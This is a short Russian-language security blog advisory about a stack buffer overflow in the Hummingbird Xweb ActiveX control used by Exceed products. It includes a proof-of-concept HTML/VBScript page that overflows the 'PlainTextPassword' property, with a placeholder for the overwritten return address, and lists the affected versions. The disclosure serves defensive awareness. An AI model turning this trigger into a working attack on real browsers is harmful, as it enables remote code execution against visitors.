Описание эксплойта:
В версии 13.0 уязвимость отсутствует, т.к. она скомпилирована с опцией "/gs", в отличие от предыдущих.
Пример эксплоита:
<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1
</script>
</html>
Примечание: XXXX - перезаписанный адрес возврата.
Описание уязвимости:
В ActiveX-компоненте Hummingbird Xweb (Hummingbird.XWebHostCtrl.1, hclxweb.dll) обнаружена уязвимость к выполнению произвольного кода при посещении в Internet Explorer веб-страницы, содержащей вредоносный вызов. Присвоение чрезмерно длинного значения свойству "PlainTextPassword" приводит к переполнению буфера, расположенного в стеке.
Уязвимы также продукты Exceed, использующие данный компонент: 10.x, 2006 11.x, 2007, 9.x, Exceed PowerSuite 10.x.
ЗАЩИТА:
По данным на 20 октября 2008 г., уязвимость не устранена.
Безопасность в интернете, то что должен знать каждый человек у которого есть компьютер! Информация будет полезна для администраторов, занимающихся обеспечением безопасности сетей, для программистов, стремящихся к созданию защищенных приложений, а также для всех тех, кто интересуется вопросами сетевой защиты.
0 коментарии:
Оставить коментарий